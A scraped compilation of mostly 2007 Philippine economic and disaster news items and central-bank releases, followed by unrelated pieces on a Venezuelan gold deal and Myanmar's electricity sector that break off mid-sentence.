Sen. Edgardo J. Angara lauded the expanded market for Philippine products through JPEPA but he stressed that the opening of the market does not necessarily mean the Philippines would automatically enjoy the benefits.

He urged the government to prepare a plan of action that could enable local producers to meet the demand in Japan, including availability of capital, technical assistance and trade missions. He also pointed out that in the case of agricultural products, it is necessary to educate producers on the stringent quarantine standards of Japan so that local producers could meet them.

“At the same time that the government is trying to maximize the market access opportunities offered by JPEPA, it should also provide safety nets for sectors that would be adversely affected by it,” él dijo. “We should maximize our gains and minimize our losses.”

Trade and Industry Secretary Peter Favila said that while a number of products exported to Japan already enjoy zero tariffs, the agreement would make the zero tariffs a permanent benefit.

Angara said that because JPEPA would make P5.7 billion of Philippine exports to Japan permanent at zero tariff, the market access of these products will be predictable.

“This will give more room for planning, investment expansion and growth,” he affirmed.

Ambassador Manuel Teehankee, the Philippines’ permanent representative to the World Trade Organization (WTO), said that the Philippines is not obliged to grant to other friendly countries the concessions given to Japan under JPEPA.

He said that the Most Favored Nation clause of WTO would not be applicable to the agreement since it was done outside the WTO.

During the hearing, former socio-economic planning Secretary Solita Monsod also endorsed to the Senate concurrence to JPEPA.

“The benefits of JPEPA far exceed its cost. Please ratify,” she pleaded.

Roxas, who presided over the hearing in the absence of Sen. Miriam Defensor Santiago, set the next hearings on the JPEPA on December 13 and 14.

Original article at Mikrofax 23/11/2007 13:53 http://www. mikrofax. com/news/Philippines-recognised-for-procurement-reform/430021579/18367799.html

The World Bank has announced that it will adopt procurement procedures developed by the Philippines to provide billions of dollars in loans to six government agencies during 2008.

Filipino budget and management secretary, Rolando Andaya, has held a meeting with the World Bank country manager for the Philippines, Maryse Gautier, to discuss a deferred road-building loan and the country's procurement systems.

He claims that the World Bank is now planning to use procurement processes developed in the Philippines for projects in other Asian countries and for training purposes. The bank's procurement sector helps borrower countries to improve their procurement systems.

The road-building loan has been deferred while the World Bank awaits information on an investigation into the bidding for two road projects in the Philippines and Mr Andaya insists that the incident has strengthened the relationship between the World Bank and the Filipino government, particularly in terms of procurement issues.

According to the Manila Standard, the Filipino government believes that the problems over the road-building loan are down to weaknesses in the World Bank's own procurement system rather than Manila's.

The World Bank stated on its website: "The initial gains from its implementation have earned the Philippines international recognition for procurement reform in some key sectors, including education."

Original report at ABS-CBN News http://www. abs-cbnnews. com/storypage. aspx? StoryID=100270

President Arroyo on Saturday checked up on the disaster preparedness of local government officials and this time of the provinces of Region 2 as Typhoon Mina changed course and is now moving very slowly towards the provinces of northern Luzon.

After a briefing given by the National Disaster Coordinating Council on the change in the movement of the Typhoon Mina (international codename Mitag), Mrs. Arroyo called on the phone several local executives of the affected provinces.

Among those who expressed their readiness to handle the effects of the powerful typhoon were Quirino Gov. Dakila Carlo Cua, Isabela Gov. Grace Padaca, Nueva Vizcaya Gov. Luisa Lloren Cuaresma, Aurora Gov. Bellaflor Angara-Castillo Ifugao Gov. Teodoro Baguilat and Gov. Alvaro Antonio of Cagayan.

Antonio reported that the Cagayan Provincial Disaster Coordinating Council (PDCC) have been mobilized to evacuate residents living near riverbanks and other low-lying areas, while Angara-Castillo said that their province is already prepared for the typhoon’s onslaught.

Cuaresma reported that the municipal disaster coordinating councils in the province have been reactivated. The Nueva Vizcaya governor requested a chopper from the Philippine Air Force to bring relief goods to remote areas in case landslides occur.

Meanwhile, Baguilat told those in the meeting that Ifugao was already prepared and that he has coordinated with the mayors in his province.

Padaca, meanwhile, said that they are monitoring the situation now that Isabela is directly in Mina’s path. They are evacuating around 54,000 residents, and said that in the municipality of Dinapigue evacuees is are being assisted by soldiers from Army’s 7th Infantry Division.

Quirino’s Cua meanwhile has given instructions to provincial officials to identify areas that are prone to floods. He also reported that the Department of Social Welfare and Development office in the province will provide food at evacuation centers, and that he has requested the NDCC to coordinate with the Quirino PDCC because of lack of logistics in the area.

Cua also reported that the town of Madela is already isolated. He also took the occasion to ask from the chief executive financial assistance for a repair of a bridge damaged by previous typhoons.

Mrs. Arroyo on Friday also called for an emergency meeting of the NDCC to check on the preparations of local officials in the Bicol Region which at that time was expected to bear the brunt of the powerful typhoon.

The Philippine Atmospheric, Geophysical and Astronomical Services Administration (PAGASA) reported to Mrs. Arroyo that the typhoon was moving very slowly toward northwest.

It is expected to cross northern Luzon and parts of Central Luzon, hitting Aurora, Isabela, Quirino, Nueva Vizcaya, Ifugao, Mountain Province, Benguet, and Ilocos Sur.

The weather bureau expected Typhoon Mina to make landfall in the Aurora-Isabela area by Sunday noon.

Earlier, all government agencies in Isabela and Aurora provinces have been placed on alert in anticipation of the landfall of typhoon Mina.

NDCC spokesman Anthony Golez said the order came after the typhoon changed direction and veered towards the northwest direction.

He said NDCC chief Gilbert Teodoro Jr. has already ordered the regional disaster coordinating councils in Regions 1, 2, 3,4-A and 4-B to undertake all precautionary and preparedness measures.

"The different government agencies have undergone all their precautionary activities as well…evacuations are taking place as of the moment," Golez in a press conference at the NDCC office in Camp Aguinaldo, Quezon City.

Secretary Estrella Alabastro of the Department of Science and Technology (DOST) stressed that they had already forecasted two scenarios last Thursday, that the typhoon might move westward to Bicol or hit northwest of Aurora.

Alabastro said the second scenario would likely happen as Mina inched slowly toward that direction.

Bangko Sentral Media Release 11.23.2007 http://www. bsp. gov. ph/publications/media. asp? id=1695

Business sentiment remains strong

Respondent firms expressed strong confidence that the economy would continue to improve in the fourth quarter as the confidence index (CI) rose quarter-on-quarter by more than seven index points to settle at 48.0 percent. Respondents attributed their optimism to the following factors: 1) a generally stable macroeconomic environment (as evidenced by low inflation, stable interest rates, and appreciating peso); 2) pick-up in demand with the approach of the Yuletide holidays; 3) higher OFW remittances; 4) harvest season; 5) increase in foreign investments; and 6) new and enhanced business strategies.

However, year-on-year, the CI was slightly lower by 1.4 index points as the number of respondents who indicated “no change” in sentiment has increased. Nonetheless, the current level is the second highest level since it breached the 40.0 percent-mark in Q4 2006. The respondents’ slightly less optimistic outlook on a year-on-year basis may have been influenced by the recent events in the local and global forefronts such as: 1) concerns over a possible slowdown in the US economy due to problems in the housing market; 2) unabated increase in crude oil prices; and 3) local political noise.

By contrast, the economic outlook for Q1 2008 was favorable compared to the same period a year ago as the index at 40.9 percent was up by 3.8 index points year-on-year. As expected, the quarter-on-quarter CI declined by 12.2 index points due to expectation that business will slacken after the Yuletide season.

During this quarter’s survey, more respondents from the NCR (National Capital Region) were bullish on the economy than their counterparts from the AONCR (Areas Outside the NCR).

Classifying respondent firms according to type of business (i. e. importer, exporter or engaged in dual roles), results indicated that importing firms were the most bullish on the economy while exporters were the least optimistic. The upbeat outlook of the importers may be attributed in part to the stronger peso that reduces the cost of their imports in peso terms.

A breakdown of respondents by employment size revealed that large-sized firms (with 500 and more employees) were the most optimistic on the economy, with the index at 53.0 percent in the Q4 2007 and 44.4 percent in the next quarter.

The economic outlook of all sectors broadly improves

The fourth quarter indices of all major sectors went up quarter-on-quarter, except that of construction although its index remained as one of the highest among the four major sectors.

The highest confidence level in Q4 2007 was posted by the services sector at 60.3 percent, due mainly to the brisk business outlook of the hotels and restaurants sub-sector as they expect greater business opportunities during the holidays.

The construction sector at 52.5 percent, meanwhile, registered the highest year-on-year increase of 7.8 index points, reflecting the current property boom in the market.

As expected, the business outlook of the wholesale and retail trade sector as well as the industry sector at 46.5 percent and 39.2 percent, respectively, were higher quarter-on-quarter, while remaining almost unchanged compared to their year-ago levels. This could be due in large part to greater business operations of firms in anticipation of the heightened consumer demand during the Christmas season.

By Q1 2008, sectors anticipated slower business economic activity compared to the previous quarter as consumers typically adjust their spending behavior after the holidays. Notwithstanding this, firms from the industry, construction and services sectors were upbeat that economic activity would be moderately stronger than in Q1 2007.

Respondents anticipate improvement in operations

Respondents who anticipated an improvement in their fourth quarter operations outnumber those who indicated otherwise as the indices remained positive. Respondents were broadly anticipating better business operations this quarter relative to a year ago but were expecting a slowdown compared to the last quarter. The lower business production in Q4 2007 for orders in Q1 2008 could be dragging down the outlook on business operations for Q4 2007 relative to Q3 2007.

Access to credit and financial conditions remain favorable

The access to credit index remained positive at 7.3 percent indicating an improvement in the availability of lending facilities as perceived by respondents. This is the sixth consecutive quarter of positive index for the measure on credit access. This trend was consistent with data on outstanding loans granted by banks, which has been on the uptrend since July 2006. The financial condition index has continued to be negative at 7.8 percent, although the index indicated that the number of respondents with unfavorable cash positions has been reduced from last year’s level of -14.1 percent.

Employment and expansion plans are up

Firms indicated that the number of people employed in Q1 2008 would go up, with the employment index at 16.6 percent. The employment outlook was particularly strong for the construction and services sectors, reflecting the positive outlook of these sectors in the next quarter. Meanwhile, the number of industry firms with expansion plans posted a record-level of 33.7 percent, indicating that more industry firms would expand operations in the next quarter. This augurs well for the economy as it points to renewed investor confidence in the country.

Although business outlook was seen to be generally improving, respondents cited competition, particularly emanating from local firms, and insufficient demand leading to low volume of sales as major risks to their business operations.

Expectations on selected economic indicators

Majority of the respondents anticipated that the peso would remain strong in Q4 2007 and Q1 2008. They expected inflation rate to accelerate in Q4 2007 but to slow down in Q1 2008. Meanwhile, respondents expected interest rates to decline in Q4 2007 and Q1 2008.

The Q4 2007 BES was conducted from 8 October to 9 November 2007. A total of 1,048 firms nationwide were surveyed. They were drawn from the Securities and Exchange Commission 2005 Top 5,000 Corporations as follows: 472 companies in NCR and 576 firms in AONCR, covering all 17 regions nationwide. The overall survey response rate for this quarter is 73.7 percent (68.9 percent last quarter). For NCR, the response rate was 80.3 percent (66.9 percent last quarter); and for AONCR, the response rate was 68.2 percent (from 70.5 percent). A breakdown of responses received by type of business showed that 14.4 percent are importers, 15.2 percent are those with dual roles (both importer and exporter), 8.5 percent are exporters. Sixty-two percent of respondents indicated either “not-applicable” or “no response” to this category.

By Roderick T. dela Cruz Original report at The Manila Standard http://www. manilastandardtoday. com/?page=news1_nov19_2007

ECONOMIC growth in the Philippines has been reducing the number of poor Filipinos, the World Bank says in a report.

It says the number of people living on less than $1 a day in the Philippines went down to around seven million, or 8.1 percent of the population, this year from 8.1 million or 9.6 percent last year.

And the number of Filipinos living on less than $2 a day fell to 32.4 million—or 37.5 percent of the population—this year from 34 million or 39.9 percent last year.

The Bank says the figures are expected to improve further in 2008, when the number of Filipinos living on less than $1 a day drops to 6.9 percent of the population, and those living on less than $2 a day falls to 35.2 percent on the back of a 6.7-percent growth in the gross domestic product in 2007 and 6.2 percent in 2008.

Despite the improvement, the Philippines still has one of the largest populations of poor people compared with Malaysia, Thailand and Vietnam, the Bank says.

It suggests that urbanization is not a guarantee for poverty reduction, noting that Thailand and the Philippines were at similar levels of development and poverty levels in the early 1980s.

While the Philippines urbanized more rapidly than Thailand, Thailand was able to reduce its poverty levels faster, and what this means is that urbanization efforts must be matched by investment in rural development for rapid poverty reduction.

“Urbanization by itself will only stimulate rural-urban migration and exacerbate problems of urban unemployment, congestion and urban poverty,” the Bank said.

It cites econometric evidence from the Philippines showing that growth in agriculture results in more poverty reduction than growth in industry.

Still, the Bank says 2007 should mark a milestone for poverty reduction in the whole of East Asia, with the number of people living below $2 a day in the region now estimated to have fallen below 500 million for the first time, down from an estimated 540 million in 2006 and over 1 billion in 1990.

“Poverty declines are widespread across countries, including both low-income economies such as Cambodia, Laos, Papua New Guinea and Vietnam, as well as middle-income economies such as China, Indonesia and Thailand,” the Bank said.

It says strong economic growth—reaching an estimated 10.1 percent for developing East Asia in 2007—is providing the underpinning for poverty reduction.

But it notes that based on individual country experiences, poverty in the region is now overwhelmingly a rural problem, with poverty declining unevenly.

“And even as poverty continues to fall in the aggregate, it is often the case that lower-income groups experience slower income growth than higher-income ones, resulting in widening income inequality,” the Bank said.

By Ma. Elisa P. Osorio Original report at The Philippine Star http://www. philstar. com/index. php? Business&p=49&type=2&sec=27&aid=2007111816

The Department of Trade and Industry (DTI) said the local electronics sector will greatly benefit if the bilateral agreement between the Philippines and Japan is implemented.

In a statement, the DTI said the ratification of the Japan-Philippines Economic Partnership Agreement (JPEPA) is expected to bring positive developments and growth to the electronics industry, which has been, for over a decade, the primary driver of Philippine exports.

A study by the Universal Access to Competitiveness and Trade (U-act) anticipates an additional export value of up to $1.26 billion in the semiconductor sector once the agreement is implemented.

Meanwhile, exporters said they will lose $2 billion annually while the semiconductor industry will miss out on $150 million investments annually if the country does not ratify JPEPA.

Sergio R. Ortiz-Luis Jr. president of Philippine Exporters Confederation (Philexport) said exporters stand to lose $2 billion from overseas sales in Japan if the JPEPA is not signed.

“We (exporters) will suffer if the JPEPA is not ratified because 14 percent of our exporters go to Japan,” Ortiz-Luis explained. He said the products that will suffer greatly are electronics and agricultural products.

Without JPEPA, Ortiz-Luis said Japan can impose higher duties on products from the Philippines when compared to other countries with an economic partnership agreement with (EPA) Japan.

The country’s fellow ASEAN member nations like Malaysia, Singapore and Indonesia have signed their own EPAs with Japan. Thailand, on the other, hand is scheduled to sign with Japan next month.

Meanwhile, Ernesto B. Santiago, president of the Semiconductor and Electronics Industries of the Philippines Inc. (SEIPI) warned the country will lose $150 million per year in additional investments.

“If the Philippines is not part of the bilateral, we will not be in the radar screens of these companies and we will not be an investment destination,” Santiago said.

According to him, more than 200 of the 900 electronic firms located in the country are Japanese owned. In fact, four of the top electronic firms have presence in the country. These are NEC, Hitachi, Fujitsu and Toshiba.

Sunday, 18 November 2007

By Eileen A. Mencias Original report at The Manila Standard http://www. manilastandardtoday. com/?page=business1_nov17_2007

The country’s balance of payments position swung to a surplus of $1.19 billion in October on the back of steady remittances and heavy investment flows, bringing the year-to-date surplus to a record high of $7.85 billion.

“The BoP has continued to register a strong surplus as a result of sustained foreign exchange inflows coming from overseas Filipinos’ remittances, merchandise exports, net inflows of foreign direct and portfolio investments and investment income of the central bank,” Bangko Sentral ng Pilipinas Gov. Amando Tetangco Jr. said in a mobile phone text message to reporters.

The BoP is a record of the country’s transactions with the rest of the world, including exports, imports, loans, investments, debt servicing and remittances. A surplus means more dollars were plowed into the economy than what went out.

The BoP surplus is expected to increase further with maturing obligations amounting to less than $420 million until the end of the year and remittances expected to exceed $2 billion in the next two months.

The huge surplus in the BoP has enabled the central bank to beef up its reserves to an all-time high of $32.4 billion at the end of October.

The central bank raised its forecast on the BoP surplus in August to $6.3 billion. Central bank officials said the surplus would now clearly exceed $7 billion. The payments surplus may fall in 2008, however, as the central bank expects growth in remittances to slow.

The payments surplus this year has resulted in a stronger peso, which in turn has helped contain inflation.

The central bank cut its key policy rates by 25 basis points Thursday due to a benign inflation outlook and manageable risks.

Money sent home to the Philippines by millions of Filipinos working abroad surged 15 percent to $10.5 billion in the nine months to September, the central bank said Thursday.

September remittances grew 12.4 percent from a year earlier to $1.1 billion, the 17th straight month that the transfers topped the billion-dollar mark, the bank said in a statement.

“Remittances have remained strong as local banks continued to provide expanded banking services to remitters and their beneficiaries, encouraging the use of formal channels of remittance transfer,” the statement said.

It said local banks have been increasing the number of remittance centers abroad and establishing tie-ups with foreign financial institutions to “better respond to the needs of overseas workers.”

Worker remittances from the eight million Filipino workers overseas are one of the country’s main sources of foreign exchange.

One in 10 Filipinos work overseas, and the funds they send home helped the economy grow at the fastest pace in two decades in the second quarter by buoying consumer spending. (With AFP)

Bangko Sentral Media Releases 11.16.2007 http://www. bsp. gov. ph/publications/media. asp? id=1694

October 2007 Flows

Bangko Sentral-registered foreign portfolio investments recorded a net inflow of US$274.1 million in October, up from September’s US$35.8 million .1 Several factors helped boost investor confidence during the month, including Bangko Sentral’s 25-basis point reduction in policy rates, the upward adjustment in IMF’s 2007 growth forecast for the Philippine economy to 6.3 percent from 5.8 percent in July, easing concerns about the US economy, and several reports of strong third quarter corporate earnings.

On a gross basis, registered foreign portfolio investments2 in October aggregated US$1.2 billion, 79 percent of which pertained to shares listed in the Philippine Stock Exchange (PSE). The balance went to placements in peso-denominated government securities, primarily Fixed Rate Treasury Notes or FXTNs. These inflows exceeded capital repatriations of US$955.2 million, which arose from the following: a) divestments from PSE-listed shares (57 percent); b) divestments from government securities (12 percent); and c) withdrawals of money market placements and peso deposits3 (combined 31 percent share).

January-October 2007 Flows

For the first ten months of the year, newly-registered foreign portfolio investments and capital repatriations/outflows totaled US$13.4 billion and US$9.7 billion, respectively, for a net inflow of US$3.7 billion. This net inflow was almost twice the US$1.9 billion net inflow for the comparable period in 2006. The generally upbeat outlook on the domestic economy sustained the positive investor sentiment.

Gross investment inflows of US$13.4 billion were 118 percent more than the total for the same period in 2006. Investments in PSE-listed shares of US$11.0 billion accounted for 82 percent of total and were 2.5 times the comparable amount in 2006. Property, telecommunication, utility and holding firms captured about 74 percent of investments in said shares.

Peso-denominated government securities, primarily FXTNs, accounted for US$2.2 billion (16 percent) of the total investment inflows while money market instruments and peso bank deposits had a combined share of just over one percent. The United States, the United Kingdom, and Singapore were the top countries of origin of the investment funds during the period.

Meanwhile, gross capital outflows of US$9.7 billion for the period were 128 percent higher than last year’s figure. The outflows arose from divestments from listed shares (47 percent of total), government securities (20 percent) and withdrawals of money market placements/peso deposits (33 percent).

1 As adjusted due to a custodian’s amended report

2 These statistics, which pertain to newly registered investments, are different from foreign portfolio investments in the balance of payments which represent actual flows during the period under review.

3 Generally represent temporary placements of sales proceeds from divestments from listed shares and government securities.

Bangko Sentral Media Releases http://www. bsp. gov. ph/publications/media. asp? id=1692 11.15.2007

Growth in outstanding loans of commercial banks, thrift banks, and rural banks (net of reverse repurchase or RRPs) remained strong at 6.2 percent year-on-year in September after reaching a six-year high of 7.1 percent in August. This was considerably higher than the 0.5 percent growth in the same period last year. On a month-on-month basis, seasonally adjusted lending declined by 0.3 percent, a reversal of the 0.2 percent growth registered a month ago.

Gross of banks’ RRP placements with the BSP, bank lending growth decelerated slightly to 4.4 percent year-on-year in September from 4.5 percent in August. On a month-on-month basis, however, seasonally adjusted lending in September grew by 1.2 percent from the 0.6 percent growth in the previous month.

Bank lending to all sectors of the economy, except mining and utilities (electricity, gas, and water), posted expansions during the period. The transportation, storage and communication sector led the expansion, growing at a robust pace of 23.7 percent, while loans to the manufacturing sector—which represented one-fifth of total loans—registered a positive growth, after posting declines during the previous seven months. The construction as well as the wholesale and retail trade sectors also grew by 11.6 percent and 5.0 percent, respectively, also higher than their growth rates in August. Meanwhile, growth in the agriculture, fisheries and forestry (AFF) as well as the community, social and personal services sectors both exhibited modest deceleration to 3.9 percent and 11.8 percent, respectively, from the 6.1 percent and 12.6 percent in the previous month. Net of RRPs, lending to financial institutions, real estate and business services (FIREBS) exhibited the same decelerating trend, growing by 6.0 percent in September from 18.2 percent in the previous month.

Meanwhile, preliminary year-to-date data indicate that non-bank sources of corporate funds have also increased, an indication of the continuing diversification of funding sources by the corporate sector.

The BSP’s easing of policy rates last October is expected to further encourage bank lending and investments going forward, and provide the necessary boost to the economy. The BSP continues to closely watch credit trends to ensure that developments in bank lending and other sources of financing are consistent with the price stability objective, while supporting the liquidity requirements of the economy.

Bangko Sentral Media Releases 11.15.2007

Remittances from overseas Filipinos (OFs) coursed through banks grew year-on-year by 12.4 percent in September 2007 to US$1.1 billion. The robust inflows in September, while slightly lower than the remittances in August, remained above US$1.0 billion for the seventeenth straight month. This brings total remittances for the first nine months of the year to US$10.5 billion, 15.0 percent higher than the level posted during the same period a year ago.

Remittances have remained strong as local banks continued to provide expanded banking services to remitters and their beneficiaries, thus encouraging the use of formal channels of remittance transfer. Moreover, local banks have been increasing the number of remittance centers abroad and establishing tie-ups with foreign financial institutions to better respond to the needs of overseas workers. It may be noted that the remittance network of local banks has increased to 3,939 in 2006 from only 1,183 in 2005 as the number of correspondent banks more than quadrupled in 2006 to reach 3,187.

In addition, preliminary data from the Philippine Overseas Employment Administration (POEA) showed that the number of deployed workers in September rose strongly year-on-year by 8.7 percent. By type of worker, the number of deployed land-based and sea-based workers increased by 3.2 percent to 70,023 and by 29.2 percent to 23,461, respectively. The number of deployed Filipino workers has been growing since July 2007, moderating the contraction in deployment seen in the early part of the year. As a result, year-to-date, the decline in the total number of deployed workers has slowed down to 1.7 percent to reach 827,275.

Remittances came largely from the U. S. the U. K. Italy, the United Arab Emirates, Saudi Arabia, Canada, Singapore, Japan, and Hong Kong.

Original report at Gov. Ph News FRIDAY, NOVEMBER 16, 2007 | FOREIGN INVESTMENT http://www. gov. ph/news/?i=19390

The Subic Bay Freeport Zone has attracted yet again another big-ticket investment with Redondo Peninsula Energy, Incorporated (RP Energy) investing $420 million in a 300-megawatt (mw) coal-fired power plant in the SBFZ starting next year.

RP Energy officials, who paid a courtesy call on President Gloria Macapagal-Arroyo in Malacanang this morning, said their investment would double to $840 million once Phase 2 of the project is completed.

The power project is a joint venture of Taiwan Cogeneration Corporation (TCC) and Aboitiz Power Corporation (APC).

The $420-million initial investment is only for Phase l of the power plant. Completion of Phase 2 would also double the plant’s capacity to 600-mw.

RP Energy officials said the power project would be operational by 2011, in time for the projected power supply crunch in Luzon of 1,950 MW in 2010-2014.

The President was briefed on the project by TCC and APC officials composed of TCC president Brian Hsu, TCC vice president Henry Wu, TCC project manager Sean Chen, APC president Erramon Aboitiz, APCE vice president Luis Miguel Aboitiz and APC chairman Jon Aboitiz.

Also present were Energy Secretary Angelo Reyes, Chairman Ed Pamintuan of the Subic-Clark Alliance for Development Council (SCADC), and Subic Bay Metropolitan Authority (SBMA) Administrator Armand Arreza.

Miguel Aboitiz said their circulating fluidized bed (CFB) technology is clean and environment-friendly, adding that being one of the most efficient coal-fired power generators in Luzon, the facility is guaranteed to easily pass the national emission level standards.

The Taiwanese investors said they are very appreciative of the government’s support to their project.

“We believe the national economy of the Philippines has entered a stage of steady and robust growth under Your Excellency’s leadership and we are very comfortable with the prospect of our project,” they told the President.

In her trips abroad, the President has made it a point to promote Clark and Subic as an alternative and competitive investment hub in the Southeast Asian region.


We've almost begun to take it for granted that climate change is a man-made phenomenon. But just as the environmental lobby think they've got our attention, a group of naysayers have emerged to slay the whole premise of global warming.

The present single-minded focus on reducing carbon emissions may have the unintended consequence of stifling development in the third world, prolonging endemic poverty and disease.


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Is Venezuela About To Revolutionize Gold Mining With This $5B Deal?

Back from a week in the wilds of Myanmar (more on that in Prime Meridians this coming weekend). To find a lot of action happening globally in both energy and mining.

One story however, stands out in both size and strangeness. From a spot that’s seen a lot of unusual developments in the resource sector lately.

Late in February, I described how the Venezuelan government had created a new, military company for oil and mining ventures.

And late last week, the country’s central bank announced a major new initiative to revolutionize the country’s gold mining industry.

Related: Argentina Charts Course For Renewable Energy

That involves a long-standing player in Venezuela’s gold sector: Spokane, Washington-based Gold Reserve Inc. A company that worked in the country from 1992 to 2009, proving up the 10 million-ounce Brisas gold project.

The Venezuelan government revoked Gold Reserve’s production permits for Brisas in 2008. Causing the company to file an arbitration claim — which was upheld by the World Bank in 2014, with an order for Venezuela to pay $740 million in damages to Gold Reserve.

But Venezuela’s central bank President Nelson Merentes told Bloomberg on Friday that there is a new approach to the project. With Merentes saying that a joint venture has been struck whereby Gold Reserve will retain 40 to 45 percent interest in the project, with the government taking a 55 to 60 percent stake.

Related: The Allure Of Shale Is Wearing Off

The most intriguing part of the announcement however, was Merentes saying that Gold Reserve will partner with “the largest gold producer in the world and the largest copper producer” as part of mine development.

Merentes also said that the deal will bring $5 billion in investment funds into the country. With $2 billion going to project development, and $3 billion going to the state.

This sounds bizarre in the utmost — suggesting that incoming players are going to pay billions for the right to operate Brisas. Which would represent a heavy pricetag, even for a 10 million-ounce mine.

Related: Oil Price And Its Effect On Production

Equally interesting is the identity of the supposed backers here. With Merentes refusing to name names, but noting that the major partners will come from the U. S. Germany and Canada. (For the record, the world’s largest gold miner is Barrick Gold, while the world’s largest copper producer is Chile’s Codelco.)

All of which makes this an outrageous-sounding — but intriguing — story. Watch to see what details actually materialize here.

Here’s to talking big.

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Electric Vehicles Could Soon Reduce Oil Demand By 13 Million Barrels Per Day

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Apr Energy. Electricity Challenges in Myanmar: Opportunities for U. S. Companies?

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Electricity Challenges in Myanmar: Opportunities for U. S. Companies?

Jenny Lin, Founder of Asia Taktik LLC

In fiscal year (FY) 2014 and 2015, Myanmar averaged 7.8% gross domestic product (GDP) growth - which is significant compared to the 3% growth rate for most econo - mies. The catalyst behind the growth was the suspension of sanctions, which led to surge in foreign direct investments (FDI) and relative ease in Myanmar's business climate. While a significant amount of the FDI are directed to Myanmar's power and oil and gas sectors, electricity shortage remains a key challenge; according to the Ministry of Electric Power (MOEP), this shortfall is attributable to theft, poor infra - structure, and lack of investment.

To bring electricity to more people in Myanmar, American companies are already contributing to Myanmar's energy development. In 2012, the Myanmar govern - ment selected General Electric's (GE) aeroderivative gas turbine technology and technical advisory services to build a natural gas-fired power plant. The plant, lo - cated in Alhone Township, Yangon City, will produce 100 megawatts (MW). 1 In 2014, Myanmar Electric Power Enterprise (MEPE) signed a two-year agreement with APR Energy to build the first US-Myanmar power generation. APR Energy's famous turn - key solution managed to produce one of the largest thermal plants in Myanmar in about three months. Dubbed the "pop-up power stations" by BBC News, APR En - ergy's Kyaukse power plant is run by 68 of the newest generation CAT Gas Power

Modules (GPM); as of 2014, the pow - er plant had a capacity of 100 MW. 2

As of March 2015, it had guaranteed minimum delivery of 82 MW to 102

Much more can be done. American companies should consider the MOEP's open invitation for the fol - lowing collaboration schemes: 1) Capital investment under the in - dependent power producer (IPP) scheme; 2) Township-wise privati - zation in distribution; 3) Invest - ment in material and equipment in planned projects; 4) Upgrade, extend and refurbish distribution system; 5) Investment in smart grid and outage management project;

6) Application distribution software and training.

Companies should tread carefully and understand the ministries re - sponsible for the power sector to identify relevant policies and regu - lations; more importantly, they should seek expert advice where applicable. James Wendelken, founder of Capformance and Asia Taktik advisor, has a special focus on advancing productivity, standards, reliability, safety, growth and sus - tainability in STEM (Science, Tech - nology, Engineering, Math) indus - tries; other Asia Taktik advisors are specialized in mitigating political, market, legal, and operational risks of doing business in Asian countries.

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

&toro; The Republic of the Union of Myanmar is located in a strategic, resource-rich region in Southeast Asia; &toro; It is neighbor to the People's Republic of China, Laos, Thailand, Bangladesh, and India; &toro; It has access to the Indian Ocean and the Andaman Sea; &toro; It exports products that include rice, fishery and mineral; &toro; It covers a total area of 676,581 sq. km, and is home to approximately 51 million people; 4 • Since 2011, policy reforms and the easing of U. S. and E. U. sanctions have triggered a "gold rush."

Surging FDI and Cross-Sector Reforms

According to the Myanmar Investment Commission, Myanmar's reformed Foreign Investment Law explain much of the surge in FDI. 5 During FY 2010- 2011, about $756 million FDI entered Myanmar 6 ; $3.5 billion in FY 2013-14; $6.62 billion between April and December 2014; and only months into 2015, it is estimated that Myanmar has received more than $6 billion in FDI. 7 Among the top investors are China (i. e. mainland and Hong Kong), South Korea, and Thailand, which have injected an estimated 71.9%, 10%, and 8% respectively, of the total FDI in Myanmar between 2008 and 2013, according to KasikornBank, a Thailand-based bank. 8 The Foreign Investment Law of 1988 was updated in 2012 to allow foreign investors to access Myanmar's economic incentives in return for capital investments. Companies interested in investing in the country are encouraged to register under the Foreign Investment Law as registered companies enjoy advantages over unregistered companies. According to Tilleke & Gibbins, a leading law firm in Southeast Asia, registered companies enjoy: 1) Basic "guarantees" against nationalization and arbitrary state actions and that invested foreign capital may be remitted in the same currency when the term of the investment contract expires; 2) Long-term leases for permitted foreign or joint venture companies with terms of up to 50 years, which are extendable twice for further 10-year periods (i. e. to a maximum of 70 years); 3) Provisions for the repatriation of profits and invested funds on an ongoing basis, subject to payment of taxes and creditors; 4) Tax exemption for at least five consecutive years, commercial tax relief, and customs and other tax relief. 9 Myanmar's cross-sector policy reforms have made for an even friendlier business climate. In 2013, for example, the government 1) removed import/export licensing requirements on approximately 600 products; 2) approved new provisions on FDI Law, allowing foreign investors to venture into certain sectors under the 80% equity requirement with 20% Myanmar citizen ownership, among others; 3) endorsed the Central Bank of Myanmar Law that, paving the way for an operationally independent Central Bank; 10 4) enacted a new telecommunications law, which allowed the issuance of operating licenses to foreign entities and the establishment of the Myanmar Telecommunications Commission, an independent regulator. Since the suspension of sanctions, multinational corporations, such as Microsoft, Cisco, Gap Inc. Hewlett Packard, Johnson and Johnson, Proctor and Gamble, Coca-Cola, Ford, Samsung, and Unilever, as well as Johns Hopkins University, have ventured to Myanmar. But more can be done.

Virtually all sectors comprising Myanmar's economy remain underdeveloped. These include agriculture, infrastructure, hotels, manufacturing, natural resources, power, professional services, telecommunications, transportation, and tourism. Among the sectors, the power sector is crucial to Myanmar's future development and remains a weak link because of electricity theft and outdated infrastructure and technology.

&dupdo; 2015 Asia Taktik LLC, a Texas limited liability company. Todos los derechos reservados.

Domestic Power Shortage

Myanmar is in dire need of increased power generation, upgraded electricity transmission and improved distribution systems for its domestic end users. The country has a 33% electrification rate; out of 51 million of Myanmar's population, only 3.1 million to 12.8 million have access to electricity. 11 According to officials from the MOEP, the power shortage is associated with theft of electricity, poor infrastructure, and lack of investment.

Electricity theft is a major concern of the MOEP. Theft enforcement is virtually impossible without smart meters in place and it increases the cost of power production; more importantly, the reliability of the power distribution system is called into question when electricity is not delivered to legitimate consumers. That said, Myanmar's high poverty and unemployment rates are contributing factors to the people's unwillingness to pay. More than 15.3 million people (30% of the total population) in Myanmar live below the international poverty line (i. e. less than $1.25 per day). In comparison, Cambodia has about 3.1 million people (20 percent of its total population) living below the poverty line, according to the CIA World FactBook. Unfortunately, electricity theft is not unique to Myanmar. In Asia, Vietnam reported more than 2,300 cases of stolen electricity in its northern provinces and cities in 2012. 12 During the first five months in 2012, Electricity of Vietnam Group reported a $310.4 million loss in revenue due to theft. 13 And, in India, according to Ratul Puri, Chairman of Hindustan Powerprojects, about 80% of electricity loss is due to theft, contributing to blackouts as well as an annual loss of $17 billion in revenue. 14 In the U. S. it is estimated that up to $6 billion of electricity is stolen as of 2010. In Houston, Texas, legitimate consumers bear the costs of unpaid electricity of up to $14 million. 15 The Houston Police Department stated, in a KHOU news interview, that at least 10,000 people are engaged in electricity 